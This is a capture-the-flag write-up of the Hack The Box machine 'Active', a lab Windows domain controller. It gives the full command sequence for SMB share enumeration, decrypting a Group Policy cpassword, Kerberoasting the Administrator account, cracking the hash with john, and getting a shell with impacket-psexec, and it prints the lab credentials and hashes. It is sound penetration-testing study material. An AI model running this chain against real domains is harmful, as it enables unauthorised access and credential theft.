Enumeration
Nmap Scanning
Command
1
└─$ nmap -sC -sV 10.10.10.100 -oN nmap-scan
Result
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# Nmap 7.93 scan initiated Mon Dec 19 18:37:32 2022 as: nmap -sC -sV -oN nmap-scan 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.32s latency).
Scanned at 2022-12-19 18:37:33 EAT for 736s
Not shown: 982 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-19 15:46:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open unknown
49165/tcp open unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62820/tcp): CLEAN (Timeout)
| Check 2 (port 40109/tcp): CLEAN (Timeout)
| Check 3 (port 41928/udp): CLEAN (Timeout)
| Check 4 (port 38631/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 19 18:49:49 2022 -- 1 IP address (1 host up) scanned in 737.12 seconds
The above result shows different ports open and we can check them, lets start with smb
Enumerate smb
We can run smbmap to check the files and permissions in the service
Command
1
2
3
4
5
6
7
8
9
10
11
12
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
After testing to access the smb the only promising content was Replication directory.
Another thing is smbmap has an ability to list things in recursive mode and by this we can check all the Replication directory to see if there anything interesting.
Command
1
2
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ smbmap -H 10.10.10.100 -R Replication
For this box the above command failed so i decided to use smbclient and navigate to Replication manually, this resulted to the following:
1
2
3
4
5
6
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 13:37:44 2018
.. D 0 Sat Jul 21 13:37:44 2018
Groups.xml A 533 Wed Jul 18 23:46:06 2018
5217023 blocks of size 4096. 244870 blocks available
I downloaded Gropus.xml file which is Group Policy file with local account users information, it was very common in 2008 Windows Server. I downloaded the file into my Linux machine by using get command and it contains the followings contents:
1
2
3
4
5
6
7
8
9
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18
20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description=""
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>
The important details are username : active.htb\SVC_TGS and cpassowrd : edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqhgit+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
Then since we have username then we can try to crack his password
Cracking the Password
To crack this kind of password the tool known as gpp-decrypt can be used
1
2
3
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
Hunting for other users in Active Directory
Command
1
2
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ impacket-GetADUsers -all active.htb/svc_tgs -dc-ip 10.10.10.100
Result
1
2
3
4
5
6
7
8
9
10
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Querying 10.10.10.100 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2018-07-18 22:06:40.351723 2022-12-20 09:43:59.406154
Guest <never> <never>
krbtgt 2018-07-18 21:50:36.972031 <never>
SVC_TGS 2018-07-18 23:14:38.402764 2018-07-21 17:01:30.320277
I tried to login by using impacket-psexec but it failed due to reason that user svc_tgs is not administrator but since we have credentials we can use smbmap to check what this user can do
1
2
3
4
5
6
7
8
9
10
11
12
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ smbmap -H 10.10.10.100 -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
User svc_tgs can read into users directory, so we can navigate to it by using smbclient to take a user flag.
1
2
3
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ smbclient //10.10.10.100/Users -U svc_tgs
Password for [WORKGROUP\svc_tgs]:
Download user flag
1
2
smb: \svc_tgs\desktop\> get user.txt
getting file \svc_tgs\desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
User flag
1
2
3
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ cat user.txt
d0d2d6a0c7******
Administrator Account
Kerberosting
Lets try impacket-GetUserSPNs to see if active\Administrator account has been configured with a SPN.
Command
1
2
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100 -request
Result
1
2
3
4
5
6
7
8
9
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 22:06:40.351723 2022-12-20 09:43:59.406154
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$0bd99a2a651a9a75117130fff4ae9e14$331ea106f7428a9f4fbdc7a11e3704e2fc2beab0061dc6d4ec24494003918b22caa904285de963ad64fbf045501d137a6c22d04946e8c9b9240c9bdfa29ae1401f89ef0992aefafe1c4dca808e531c9f3ab76533b0f4a6c7a1f74f4861228e9aab0023ca0403db6de23fd1a03fb91755f2848d487c31aa8f4e66f0d066b71a0d2f178d79d1eac20c0c19392cccf1a35198334b668c5c6d1492ee415e2a409da193e9ff251b6828dab6b21ce32b92b30708912d4bb9ff7f9165c8b0ebe767c8fbb6c4b110576f7a99bdb9e76f0e2b96872e5abf3d2891dd3be28ff8e339db1f1b158cf3188b80db60270d683d247eca2188432f31b1953eda154e12316882cf759116ac65eb48fa252f2f025cd7efaa7b4877a9e2ad86a871663438f9168af73372dfaea26a2d73085bebd159de9c283ead678180e9c3a8f4e71ca79cf904bb5f973086591b0e0d9b7873aeb4e88c11247aabf8a6fafd20ce05332611644dab78601dc7ff1a832250b6738e91bbab5c925d0346e5041d742c1ea52df18a3124ae044cafc4cf1faf500a13e48e5dcf5e9310af8a6b5f1d70666cbc56c691d57ed7c853ec9a1cc6b3609495c0954e23498c3b16b35a0de62b4644328d1b54a97a87c2375c9491716b8bc2995925bc3583dc3511d4430d9113794d158775d64633ba6a147c84c36247442cb1ae4ab5995fb45ba416dfed95d2ddc6a98f3c93de6a2daa7ae66f40f2fb2c94dbdcb861300d95b851524100ba7a629ff8170413a5fafb9d0e92c101a3f0060129cd90e8e8d6d28141f1f9b9703f619c09067e2445f8f10a728cec621af2d0a262be031f52c784a322fc4763cc5df164c362bc1aa25567cfe2cb335d8a9cf349df03096b9e4a3f563d02ecb74ce90ee7e20cfae13fc0b7972ea4433514435459a0bd48fb1dd159de9a910b8dcd4d632aad3e7c9c91bd39966b13a26351fd20b2f88305365d0e71f0a50db003c33408efd945d2d0d2c8f4859587ddc7e1df7635a8fc5f0ef1879fc65c2a8811af80454f6a667c9987344f0e380d0a5d901bb14b943745afbfb9ecc6ccb2a6ca3d31dbd02dd53802e8398102dafe8df80ef6208f83a10293dc0e5fdf8f928d624eb0812ec6aab0f22de1435a7940f7bb29b3de04414560a9096202936a812feaf314823a1f3dc73f78a18b4bf396a822c95a9b0bacc5783e487591a83aebee0a89f97feedde68e881cec2ca81c00270a75dd3d1159214ac27b45aa120f26dba09f05f8251e
crack the hash
1
2
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Result
1
2
3
4
5
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ john hash --show 1 ⨯
?:Ticketmaster1968
1 password hash cracked, 0 left
Now login to the machine as user Administrator by using impacket-psexec
1
2
┌──(gemstone㉿hashghost)-[~/…/htb/Machines/vip/active]
└─$ impacket-psexec active.htb/administrator:Ticketmaster1968@10.10.10.100
Root flag
1
2
C:\Users\Administrator\Desktop> type root.txt
12a3d6a9eb**********
The end.
1
Mungu Nisaidie